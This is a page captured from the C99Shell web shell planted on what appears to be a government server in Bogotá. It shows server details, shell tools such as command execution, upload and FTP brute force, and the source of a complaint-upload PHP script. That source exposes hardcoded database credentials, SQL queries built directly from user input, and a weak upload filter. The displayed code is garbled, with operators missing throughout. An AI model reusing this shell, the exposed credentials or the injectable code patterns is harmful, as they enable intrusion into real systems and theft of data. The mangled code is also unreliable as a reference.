!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Extranet\phpscripts\cdr\   drwxrwxrwx
Free 4.08 GB of 39.52 GB (10.32%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     enviar2.php (12.52 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<html>

<head>
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
<title>Formulario de Quejas y Reclamos...</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></head>

<body topmargin="0" link="#F97C00" vlink="#000000">

<table border="0" width="687" bgcolor="#FFFFFF" cellspacing="0" cellpadding="0"
bordercolor="#FFFFFF">
  <tr>
    <td width="100%" colspan="2"><img src="../ince/encabe4.gif" width="744" height="70"
    alt="encabe.gif (14884 bytes)"></td>
  </tr>
  <tr>
    <td width="50%">&nbsp;</td>
    <td width="50%"><p align="right"><a href="http://www.dama.gov.co"><img src="../ince/back.gif"
    width="73" height="16" alt="Regresar al Home..." align="left" border="0"></a></td>
  </tr>
  <tr>
    <td width="100%" colspan="2"><div align="center"><img src="../ince/cdr.gif" width="500" height="69"></div></td>
  </tr>
</table>

  <p>

<table border="1" width="687" cellspacing="0" cellpadding="5" bordercolor="#FFFFFF">
  <tr bgcolor="#CC0000">
    <td colspan="3" align="center">
      <div align="left"><font color="#FFFFFF" face="Arial Black">Proceso de carga
        de la informaci&oacute;n...</font></div></td>
  </tr>
  <tr>
    <td colspan="3" valign="top"> <div align="left">
<?php
$fi 
$diad "/" $mesd "/" $anod;
$ff $diah "/" $mesh "/" $anoh;

$anod $anod 2000;
$anod $anod 10000;
$anoh $anoh 2000;
$anoh $anoh 10000;
$mesd $mesd 100;
$mesh $mesh 100;

$fi1 $anod $mesd $diad;
$ff1 $anoh $mesh $diah;




$err=0;
$err1=0;
$err3=0;
$err4=0;
$err5=0;
$err10=0;
$err11=0;
// Validación de fecha
$dif $ff1 $fi1;
if (
$dif or $dif 31
{
    
$err5=1;
    
$terr="Las fechas que usted ingreso son incongruentes, o exceden los 30 días del periodo máximo de envio.<BR>";
}

if 
$err5=1 then
{
?>
<font size="2" face="Verdana, Arial, Helvetica, sans-serif">
        <strong>Se&ntilde;or(a) <?php echo $nombre?>, se ha producido un error:</strong> <?php echo $terr?></font>
<?php
}

// Validación del nombre
$veri strlen($nombre);
if (
$veri 4
{
    
$err=1;
    
$terr="El nombre que usted ingreso, parece no ser válido, por favor intentelo nuevamente.<BR>";
}
if (
$err==1
{
?>
<font size="2" face="Verdana, Arial, Helvetica, sans-serif">
        <strong>Se&ntilde;or(a) <?php echo $nombre?>, se ha producido un error:</strong> <?php echo $terr?></font>
<?php
}

// Validación de la identificación
$veri strlen($cedula);
if (
$veri 6  or $veri 12
{
    
$err1=1;
    
$terr="La identificación que usted ingreso, parece no ser válida, por favor intentelo nuevamente.<BR>";
}
$te 0;
for (
$i 0$i <= 9$i++) 
{
    
$veri1 substr_count($cedula$i);
    
$te $te $veri1;
}
if (
$veri != $te
{
    
$err1=1;
    
$terr="La identificación que usted ingreso, tiene caracteres no válidos, por favor intentelo nuevamente.<BR>";
}
if (
$err1==1
{
?>
    <font size="2" face="Verdana, Arial, Helvetica, sans-serif">
        <strong>Se&ntilde;or(a) <?php echo $nombre?>, se ha producido un error:</strong> <?php echo $terr?></font>
<?php
}

// Validación del telefono
$veri strlen($telefono);
if (
$veri 6
{
    
$err3=1;
    
$terr="El teléfono que usted ingreso, tiene pocos dígitos, por favor intentelo nuevamente.<BR>";
}
if (
$err3==1
{
?>
    <font size="2" face="Verdana, Arial, Helvetica, sans-serif">
        <strong>Se&ntilde;or(a) <?php echo $nombre?>, se ha producido un error:</strong> <?php echo $terr?></font>
<?php
}
$lar strlen($file);

if (
$lar != 0
{
    
$apa substr_count($file_name,'.xls');

    if (
$apa == 0
    {
        
$terr="El archivo que usted ingreso, no corresponde al formato de Excel solicitado (.xls), por favor intente nuevamente.<BR>";
?>
        <font size="2" face="Verdana, Arial, Helvetica, sans-serif">
        <strong>Se&ntilde;or(a) <?php echo $nombre?>, se ha producido un error:</strong> <?php echo $terr?></font>
<?php
        $err4
=1;
    }
}

$link "archivos/" $file_name;
$un file_exists($link);
if (
$un == 1
{
    
$terr="El archivo que usted esta intentando ingresar, ya existe, por favor verifique el nombre e intente nuevamente.<BR>";
?>
    <font size="2" face="Verdana, Arial, Helvetica, sans-serif">
        <strong>Se&ntilde;or(a) <?php echo $nombre?>, se ha producido un error:</strong> <?php echo $terr?></font>

<?php
    $err4
=1;
}

if (
$err4==and $err5==and $err3==and $err1==and $err==0
{
    if (
$file_name != ""
    {
        @
copy("$file"archivos/$file_name")
        or die(
"No se pudo cargar su archivo anexo .xls");
    } 
    else 
    {
        die(
"No hay un archivo especificado");

    }

?>
          </tr>
          <tr bgcolor="#CCCCCC">
        <td colspan="3" valign="top"><font face="Arial Black" color="#FFFFFF"><small>Proceso
          de creaci&ograve;n y radicaci&oacute;n de la correspondencia.</small></font></td>
          </tr>
  <tr>
    <td colspan="3" valign="top"><div align="left">
<?php

    $nombre 
strtoupper ($nombre);
    
$db "sia";
    
$c1 OciLogon("EMAIL","EMAIL2003",$db);
    
$stmt ociparse($c1,"select nombre from cor_persona where codigo like '%$cedula%'");
    
$result OCIExecute($stmt);
    
$in=0;
    if (
$result == false
    {
        echo
?>        <p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> <strong>Se&ntilde;or(a)
<?php 
        
echo $nombre
?>
        , se ha producido un error:</strong> No se pudo crear el envio
        porque...no se pudo buscar si su nombre estaba registrado,
<?php
        
echo OCIError($stmt);
        echo 
"</font></p>";
    }
    else
    {
        while (
OCIFetchInto($stmt$value)) 
        {
            
$in++;
        }
    }


    if (
$in == 0
    {
        
$stmt ociparse($c1"Insert Into cor_persona
        (codigo,nombre,direccion,telefono,externa_interna)
        values
        (
$cedula,'$nombre','$direccion','$telefono','E')");
        
        
$result OCIExecute($stmt);
        if (
$result == false
        {
            echo 
"<BR> Fallo al ingresar el Contacto:";
            echo 
OCIError($stmt);
            
$err10==1;
        }
        else
        {
?>

            <p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> <strong>Se&ntilde;or(a)
<?php 
            
echo $nombre
?>
            , Ya que sus datos, no estaban registrados en nuestro sistema de contactos, se creo correctamente
            un registro a su nombre.</strong></font></p>

<?php
        
}
    }
    
    
$today getdate();
    
$month $today['month'];
    
$mday $today['mday'];
    
$year $today['year'];
    
$stmt ociparse($c1,"SELECT nvl(max(secuencial),0) + 1 FROM envista.binconsecutivo WHERE grupo = 'COR' AND nombre = 'COR_DOCUMENTO' AND vigencia = '$year' AND codigo_compania = 1 AND codigo_unidad_ejecutora = 'ER'");

    
$result OCIExecute($stmt);
    if (
$result == false
    {
        echo
?>
        <p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> <strong>Se&ntilde;or(a)
<?php
        
echo $nombre
?>
        , se ha producido un error:</strong> No se pudo crear la queja
        porque...no se pudo obtener el consecutivo,
<?php
        
echo OCIError($stmt);
        echo 
"</font></p>";
        
$err11=1;
    }
    else
    {
        while (
OCIFetchInto($stmt$value)) 
        {
            foreach (
$value as $val)
            {
                
$val++;
                
$pn $year "ER" $val;
            }
        }
    }

    if (
$err10==and $err11==0
    {
        
$as "Envio de información periodica de CDR´s al DAMA"
        
// A partir del número elegido, se inserta un nuevo registro en la base de correspondencia.
        
$stmt ociparse($c1,"Insert Into COR_DOCUMENTO
        (CODIGO_DOCUMENTO
        ,VIGENCIA
        ,EXTERNA_INTERNA
        ,ENVIADA_RECIBIDA
        ,FECHA
        ,ASUNTO
        ,TIPO_DOCUMENTO
        ,DEPENDENCIA_DESTINO
        ,FUNCIONARIO_DESTINO
        ,FOLIOS_DOCUMENTOS
        ,NUMERO
        ,PERSONA_ORIGEN)
        VALUES
        (
$val,
        '
$year',
        'E',
        'R',
        SYSDATE,
        '
$as',
        119,
        5,
        185,
        1,
        '
$pn',
        '
$cedula')");


        
$result OCIExecute($stmt);
        if (
$result == false
        {
            echo
?>
            <p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> <strong>Se&ntilde;or(a)
<?php
            
echo $nombre
?>
            , se ha producido un error:</strong> No se pudo crear el envio
            porque...no se pudo ingresar el registro en nuestro sistema de correspondencia,
<?php
            
echo OCIError($stmt);
            echo 
"</font></p>";
            
$err12=1;
        }

        if (
$err12 == 0
        {
            
$stmt ociparse($c1,"update envista.binconsecutivo
            set secuencial=
$val
            WHERE grupo = 'COR' AND
               nombre = 'COR_DOCUMENTO' AND
             vigencia = '
$year'  AND
               codigo_compania = 1 AND
             codigo_unidad_ejecutora = 'ER'"
);

            
$result OCIExecute($stmt);
            if (
$result == false
            {
                echo
?>
                <p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> <strong>Se&ntilde;or(a)
<?php 
                
echo $nombre
?>
                , se ha producido un error:</strong> No se pudo crear el envio
                porque...no se pudo actualizar el consecutivo,
<?php
                
echo OCIError($stmt);
                echo 
"</font></p>";
                
$err13=1;
            }

            if (
$err13 == 0
            {
                
// Se consulta el consecutivo en el SIA
                
$stmt Ociparse($c1"SELECT ESQ_DOCUMENTO.NEXTVAL FROM DUAL");

                
$result OCIExecute($stmt);
                if (
$result == false
                {
                    echo
?>
                    <p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> <strong>Se&ntilde;or(a)
<?php 
                    
echo $nombre
?>
                    , se ha producido un error:</strong> No se pudo crear el envio
                    porque...no se pudo obtener el consecutivo del SIA,
<?php
                    
echo OCIError($stmt);
                    echo 
"</font></p>";
                    
$err14=1;
                    }
                    else
                    {
                        while (
OCIFetchInto($stmt$value1)) 
                        {
                            foreach (
$value1 as $val1)
                            {
                                
$radSIA $val1;
                            }
                        }
                    }

                    if (
$err14 == 0
                    {
                        
//Se inserta el registro en el SIA
                        
$stmt Ociparse($c1"INSERT INTO ENVISTA.DOCUMENTO
                        (DOCUMENTO_ID,NUMERO,NOMBRE,DESCRIPCION,FOLIOS,NUMERO_RADICADO,
                        FECHA_EXPEDIDO,ACTIVO,TIPO)
                        VALUES
                        (
$radSIA,'$pn','$as','$observaciones',1,'$pn',SYSDATE,1,'SAQ')");

                        
$result OCIExecute($stmt);
                        if (
$result == false
                        {
                            echo
?>
                            <p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> <strong>Se&ntilde;or(a)
<?php
                            
echo $nombre
?>
                            , se ha producido un error:</strong> No se pudo crear el envio
                            porque...no se pudo generar el registro en el SIA,
<?php
                            
echo OCIError($stmt);
                            echo 
"</font></p>";
                        }
                        else
                        {
?>
                            <p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><strong><font size="3">Gracias</font></strong><font size="3">,<font color="#009966">
                            <strong>Envio radicado correctamente,</strong></font> </font><br>
                            Su N&uacute;mero de Radicado para la verificaci&oacute;n de su proceso
                            es: <font color="#FF0000"><strong><?php echo $pn?></strong></font></font></p>
<?php
                        
}
                    }
                }
            }
        }








        
///////////// Crear registro de envio /////////////
        
include('conectar.php');
        include(
'hoy.php');
        
$query ="INSERT INTO envios VALUES('$codigo','$file_name','$fi','$ff','N','','','$hoy')";
        
$result mysql_query($query,$db);

        if (
$result == 0)
        {
?>
<            p><font size="2"><strong><font face="Verdana, Arial, Helvetica, sans-serif" color="#000000">Error:</font><font face="Verdana, Arial, Helvetica, sans-serif" color="#999966">
                          No se pudo agregar el registro del envio de información. </font></strong></font></p>

<?php

        
}
        
OCIRollback($c1);
        
OCILogoff($c1);
    }




?>


     <p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> <strong>Se&ntilde;or(a)
     $nombre, se ha producido un error:</strong> No se pudo crear la queja
     porque...</font></p>
     <p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><strong><font size="3">Gracias</font></strong><font size="3">,<font color="#009966">
          <strong><font color="#CC0000">Archivo registrado correctamente,</font></strong></font></font><br>
          Su N&uacute;mero de Radicado para la verificaci&oacute;n de su proceso
          es: <font color="#FF0000"><strong>2000ER2485</strong></font></font></p>
      </div></td>
  </tr>
  <tr bordercolor="#999999">
    <td height="97" valign="top" bordercolor="#FFFFFF"> <p align="center"><font face="Arial"><small><small><img
    src="../ince/logalc.gif" width="80" height="85" alt="logalc.gif (3822 bytes)"></small></small></font></td>
    <td height="97" colspan="2" valign="middle" bordercolor="#CCCCCC"> <p align="left"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Todos
        los Derechos Reservados para el DAMA.<br>
        El presente servicio es un producto del Sistema de Informaci&oacute;n
        del DAMA - SIA<br>
        Bogot&aacute;, 2003.</font></p></td>
  </tr>
</table>

<p>&nbsp;</p>
</body>
</html>







:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--